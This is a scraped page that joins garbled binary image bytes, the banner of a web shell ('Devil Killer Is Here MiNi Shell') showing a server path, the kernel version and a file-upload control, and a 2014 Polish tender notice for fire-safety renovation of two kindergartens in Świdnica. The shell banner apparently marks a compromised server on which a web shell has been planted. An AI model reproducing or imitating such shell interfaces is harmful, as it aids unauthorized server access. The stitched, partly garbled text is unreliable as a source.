JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140529/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140529/181288-N-2014.html

<p class="kh_header"><b>Świdnica: wykonanie robót budowlanych, w ramach zadania inwestycyjnego pn.:


Przebudowa budynków PM 1, PM 15 i MPI 16 w zakresie dostosowania do wymogów bezpieczeństwa pożarowego

obejmująca dwa zadania pn.:

Zadanie 1 - Przebudowa budynku Przedszkola Miejskiego nr 15 w Świdnicy 
w zakresie dostosowania do wymogów bezpieczeństwa pożarowego.

Zadanie 2 - Przebudowa budynku Miejskiego Przedszkola Integracyjnego nr 16 w Świdnicy w zakresie dostosowania do wymogów bezpieczeństwa pożarowego.</b><br>
<b>Numer ogłoszenia: 181288 - 2014; data zamieszczenia: 29.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Świdnicy , ul. Armii Krajowej 49, 58-100 Świdnica, woj. dolnośląskie, tel. 074 8562850, faks 074 8523110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swidnica.bip-gov.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie robót budowlanych, w ramach zadania inwestycyjnego pn.:


Przebudowa budynków PM 1, PM 15 i MPI 16 w zakresie dostosowania do wymogów bezpieczeństwa pożarowego

obejmująca dwa zadania pn.:

Zadanie 1 - Przebudowa budynku Przedszkola Miejskiego nr 15 w Świdnicy 
w zakresie dostosowania do wymogów bezpieczeństwa pożarowego.

Zadanie 2 - Przebudowa budynku Miejskiego Przedszkola Integracyjnego nr 16 w Świdnicy w zakresie dostosowania do wymogów bezpieczeństwa pożarowego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1.	Przedmiotem zamówienia są roboty budowlane w ramach zadania inwestycyjnego pn.:

Przebudowa budynków PM 1, PM 15 i MPI 16 w zakresie dostosowania do wymogów bezpieczeństwa pożarowego
obejmujące dwa zadania pn.:

Zadanie 1 - Przebudowa budynku Przedszkola Miejskiego nr 15 w Świdnicy w zakresie dostosowania do wymogów bezpieczeństwa pożarowego.
Zadanie 2 - Przebudowa budynku Miejskiego Przedszkola Integracyjnego nr 16 w Świdnicy w zakresie dostosowania do wymogów bezpieczeństwa pożarowego.

3.2.	Szczegółowy opis przedmiotu zamówienia. 
3.2.1.	Zadanie 1: celem zadania jest dostosowanie budynku Przedszkola Miejskiego nr 15 do wymogów bezpieczeństwa pożarowego poprzez wymianę drzwi na p.poż, wymianę okna na zintegrowane z systemem oddymiania, rozbiórkę naświetla wraz z wykonaniem ścianki pełnej z cegły obustronnie otynkowanej, obudowę głównej klatki schodowej ścianą z płyt G-K oraz przeszkleniami z profili aluminiowych, rozbiórkę wykładziny oraz drewnianego parkietu z ułożeniem płytek gres, ułożenie wykładziny PCV trudnopalnej na głównej klatce schodowej, demontaż boazerii z wykonaniem tynków cem-wap, malowanie ścian, wykonanie instalacji hydrantowej wraz hydrantami, montaż zestawu wodomierzowego, zaworu antyskażeniowego, wykonanie oświetlenia ewakuacyjnego, montaż czujek dymu, montaż centralki oddymiania. Przedmiot zamówienia obejmuje również wymianę przyłącza wodociągowego. UWAGA: Zamówienie nie obejmuje montażu pożarowego wyłącznika prądu. 
Szczegółowy opis przedmiotu zamówienia zawarty jest w dokumentacji projektowej tj. projekcie budowlanym, wykonawczym, szczegółowej specyfikacji technicznej wykonania i odbioru robót, projekcie wymiany przyłącza wodociągowego oraz ekspertyzie technicznej rzeczoznawcy budowlanego i rzeczoznawcy ds. zabezpieczeń przeciwpożarowych autorstwa Spółki Inwestycyjno - Budowlanej Biodom sp. z o.o. z siedzibą w Dzierżoniowie.
3.2.2.	Zadanie 2: celem zadania jest dostosowanie budynku Miejskiego Przedszkola Integracyjnego nr 16 do wymogów bezpieczeństwa pożarowego poprzez wymianę drzwi na p.poż, wymianę okna na zintegrowane z systemem oddymiania, rozbiórkę naświetla wraz z wykonaniem ścianki pełnej z cegły obustronnie otynkowanej, obudowę głównej klatki schodowej ścianą z płyt G-K oraz przeszkleniami z profili aluminiowych, obudowa ścianką murowaną z cegły pełnej wejścia do piwnicy od strony bocznej klatki schodowej, ułożenie wykładziny PCV trudnopalnej na głównej klatce schodowej, demontaż boazerii z wykonaniem tynków cem-wap, malowanie ścian, wykonanie instalacji hydrantowej wraz hydrantami, montaż zestawu wodomierzowego, zaworu antyskażeniowego, wykonanie oświetlenia ewakuacyjnego, montaż czujek dymu, montaż centralki oddymiania, montaż pożarowego wyłącznika prądu. Ponadto przedmiot zamówienia obejmuje wymianę odcinka przyłącza wodociągowego. 
Szczegółowy opis przedmiotu zamówienia zawarty jest w dokumentacji projektowej tj. projekcie budowlanym, wykonawczym, szczegółowej specyfikacji technicznej wykonania i odbioru robót, projekcie wymiany odcinka przyłącza oraz ekspertyzie technicznej rzeczoznawcy budowlanego i rzeczoznawcy ds. zabezpieczeń przeciwpożarowych autorstwa Spółki Inwestycyjno - Budowlanej Biodom sp. z o.o. z siedzibą w Dzierżoniowie.
3.2.3.	W przypadku rozbieżności w ustaleniach poszczególnych dokumentów, obowiązuje następująca kolejność ich ważności:
1. Specyfikacja Techniczna Wykonania i Odbioru Robót,
2.Projekt Wykonawczy,
3. Projekt Budowlany,
4. Ekspertyza Techniczna rzeczoznawcy budowlanego i rzeczoznawcy ds. zabezpieczeń przeciwpożarowych,
3.2.4.	Załączony do dokumentacji projektowej przedmiar robót nie stanowi opisu przedmiotu zamówienia. Załączony jest w celu ułatwienia dokonania wyceny oferty przez Wykonawcę. Przedmiaru nie należy wypełniać ani załączać do oferty. 
3.2.5.	Przedmiot zamówienia obejmuje również aktualizację posiadanych przez Użytkowników instrukcji w sprawie zasad ewakuacji oraz planów ewakuacji.
3.2.6.	Przedmiot zamówienia obejmuje zabezpieczenie przepustów instalacyjnych EI 120 w pomieszczeniach węzłów ciepłowniczych. Ponadto przedmiot zamówienia obejmuje tynkowanie i malowanie ścian i sufitów po przekuciach i przemurowaniach otworów okiennych i drzwiowych oraz w miejscach prowadzenia wszelkich przewodów pod tynk. 
3.2.7.	Przedmiot zamówienia obejmuje również montaż po 3 szt. dodatkowych opraw oświetlenia ewakuacyjnego nad wyjściami ewakuacyjnymi w każdym z obu budynków przedszkola osobno wraz z niezbędnymi elementami towarzyszącymi np. zasilaniem oraz odtworzeniem warstw tynkarskich i malarskich (przewody należy prowadzić w bruzdach). 
3.3.	Wykonawca zobowiązuje się wykonać roboty budowlane, które nie zostały wyszczególnione                         w przedmiarze robót, a są konieczne do realizacji przedmiotu umowy zgodnie z projektem budowlanym, wykonawczym, szczegółową specyfikacją techniczną wykonania i odbioru robót oraz ekspertyzą techniczną rzeczoznawcy budowlanego i ds. zabezpieczeń przeciwpożarowych, zapisami SIWZ oraz zgodnie z obowiązującymi przepisami prawa a w szczególności ustawą Prawo Budowlane ( Dz. Ust. 2013 Poz.1409) oraz rozporządzeniami powiązanymi. 
3.4.	Wykonawca podczas prowadzenia prac uwzględni terminy przerw wakacyjnych w poszczególnych placówkach i bezwzględnie będzie wykonywał roboty budowlane w budynkach tylko w okresie przerwy wakacyjnej tak, aby nie zakłócać normalnego funkcjonowania przedszkoli. Terminy przerw wakacyjnych:
-	Przedszkole nr 15 - 01.08 - 31.08.2014 r.
-	Przedszkole nr 16 - 01.07 - 31.07.2014 r.

3.5.	Nazwy i kody dotyczące przedmiotu zamówienia określone we Wspólnym Słowniku Zamówień Publicznych (CPV):
45100000-8 - przygotowanie terenu pod budowę
45200000-9 - roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej
45300000-0 - roboty w zakresie instalacji budowlanych
45400000-1 - roboty wykończeniowe w zakresie obiektów budowlanych

4.	TERMIN WYKONANIA ZAMÓWIENIA.
4.1.	Wymagany termin realizacji zadania 1 - Przebudowa budynku Przedszkola Miejskiego nr 15 w Świdnicy w zakresie dostosowania do wymogów bezpieczeństwa pożarowego:
a)	Rozpoczęcie realizacji: w dniu podpisania umowy;
b)	Zakończenie realizacji: 22 sierpień 2014 r. 
4.2.	Wymagany termin realizacji zadania 2 - Przebudowa budynku Miejskiego Przedszkola Integracyjnego nr 16 w Świdnicy w zakresie dostosowania do wymogów bezpieczeństwa pożarowego:
a) Rozpoczęcie realizacji: w dniu podpisania umowy;
b) Zakończenie realizacji: 25 lipiec 2014 r..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.20.00.00-9, 45.30.00.00-0, 45.40.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 9.1.	Każda oferta powinna być zabezpieczona wadium. 
Wysokość wadium wynosi:
Zadanie 1: kwota 4 000 zł (słownie: cztery tysiące złotych)
Zadanie 2: kwota 3 500 zł (słownie: trzy tysiące pięćset złotych)
9.2.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert. 
9.3.	Wadium może być wniesione w formach określonych w art.45 ust.6 ustawy Pzp, z tym, że:
a/ złożone w pieniądzu: przelewem na rachunek bankowy Zamawiającego w Banku PKO S.A. I Oddział w Świdnicy 96 1240 1978 1111 0010 0166 5724. Kwota wadium wniesiona przelewem winna znaleźć się na rachunku bankowym Zamawiającego przed upływem terminu składania ofert.
b/ złożone w gwarancjach (bankowych, ubezpieczeniowych):
z treści gwarancji winno wynikać bezwarunkowo, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych art. 46 ust. 5 ustawy Pzp tj. w przypadku, gdy Wykonawca:
-	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
-	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
-	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
9.4.	W przypadku wadium wnoszonego w pieniądzu za skutecznie wniesione Zamawiający uzna wadium, które w oznaczonym terminie w dniu otwarcia ofert znajduje się na rachunku Zamawiającego.
9.5.	Wszystkie formy wadium powinny mieć określoną ważność zgodną z okresem związania ofertą. Bieg terminu związania ofertą rozpoczyna się wraz z upływem terminu składania ofert.
9.6.	Złożone w innej niż pieniądz formie winno być złożone w kasie Zamawiającego, jako depozyt, złożony za potwierdzeniem, przed upływem terminu składania ofert. 
9.7.	Dowód przelewu lub potwierdzenie depozytu należy dołączyć w oryginale do oferty. 
9.8.	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana, jako najkorzystniejsza, z zastrzeżeniem jak w pkt 9.12.
9.9.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
9.10.	Zamawiający zwraca wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
9.11.	Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie, pkt 9.8 jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana, jako najkorzystniejsza. Wykonawca wniesie wadium w terminie określonym przez Zamawiającego. 
9.12.	Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1, lub pełnomocnictw chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
9.13.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a/	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b/	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c/	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek dotyczący posiadania wiedzy i doświadczenia został spełniony, jeżeli Wykonawca wykaże się wykonaniem w okresie ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie):
6.1.2.1.	Zadnie 1: Co najmniej 1 roboty budowlanej obejmujących wymianę lub montaż stolarki drzwiowej na stolarkę spełniającą wymagania klasy EI30 o wartości nie mniejszej niż 35.000,00 PLN netto oraz 1 roboty budowlanej polegającej na wykonaniu lub wymianie instalacji sygnalizacji pożaru lub instalacji oświetlenia ewakuacyjnego o wartości nie mniejszej niż 10.000,00 PLN netto, wraz z załączeniem dowodów dotyczących tych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
6.1.2.2.	Zadnie 2: Co najmniej 1 roboty budowlanej obejmujących wymianę lub montaż stolarki drzwiowej na stolarkę spełniającą wymagania klasy EI30 o wartości nie mniejszej niż 35.000,00 PLN netto oraz 1 roboty budowlanej polegającej na wykonaniu lub wymianie instalacji sygnalizacji pożaru lub instalacji oświetlenia ewakuacyjnego o wartości nie mniejszej niż 10.000,00 PLN netto, wraz z załączeniem dowodów dotyczących tych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia został spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia posiadającymi uprawnienia do pełnienia samodzielnych funkcji technicznych odpowiednio do kierowania robotami budowlanymi w specjalnościach zarówno dla Zadania 1 i dla Zadania 2:
-   konstrukcyjno-budowlanej: osoba pełniąca funkcję kierownika budowy;
-   instalacyjnej w zakresie sieci, instalacji i urządzeń: wodociągowych i kanalizacyjnych, 
    cieplnych,  wentylacyjnych i gazowych: osoba pełniąca funkcję kierownika robót 
    branży instalacji sanitarnych;
-  instalacyjnej w zakresie sieci i urządzeń elektrycznych i energetycznych: osoba 
    pełniąca funkcję kierownika robót branży instalacji elektrycznych;
wydane zgodnie z Rozporządzeniem Ministra Transportu i Budownictwa z dn. 28 kwietnia 2006 roku w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. Nr 83 poz. 578 ze zm.) należącym do właściwej Izby lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane oraz ustawy z dnia 18 marca 2008 roku o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r., Nr 63, poz. 394),
Wskazane powyżej osoby powinny posiadać minimum 3 letnie doświadczenie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek dotyczący sytuacji ekonomicznej i finansowej został spełniony, jeżeli Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 150 tys. PLN (słownie: sto pięćdziesiąt tysięcy złotych) oraz posiada środki finansowe lub zdolność kredytową w wysokości min.150 tys. PLN (słownie: sto pięćdziesiąt tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Zamawiający uzna, że warunek dotyczący posiadania wiedzy i doświadczenia został spełniony, jeżeli Wykonawca wykaże się wykonaniem w okresie ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie):
6.1.2.1.	Zadnie 1: Co najmniej 1 roboty budowlanej obejmujących wymianę lub montaż stolarki drzwiowej na stolarkę spełniającą wymagania klasy EI30 o wartości nie mniejszej niż 35.000,00 PLN netto oraz 1 roboty budowlanej polegającej na wykonaniu lub wymianie instalacji sygnalizacji pożaru lub instalacji oświetlenia ewakuacyjnego o wartości nie mniejszej niż 10.000,00 PLN netto, wraz z załączeniem dowodów dotyczących tych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
6.1.2.2.	Zadnie 2: Co najmniej 1 roboty budowlanej obejmujących wymianę lub montaż stolarki drzwiowej na stolarkę spełniającą wymagania klasy EI30 o wartości nie mniejszej niż 35.000,00 PLN netto oraz 1 roboty budowlanej polegającej na wykonaniu lub wymianie instalacji sygnalizacji pożaru lub instalacji oświetlenia ewakuacyjnego o wartości nie mniejszej niż 10.000,00 PLN netto, wraz z załączeniem dowodów dotyczących tych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>7.7.5.	Jeżeli Wykonawca będzie polegał na zdolności ekonomiczno - finansowej podmiotów trzecich, do oferty należy dołączyć oświadczenie o solidarnej odpowiedzialności za realizację zadania Wykonawcy i tych podmiotów (art. 369 k.c.).;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

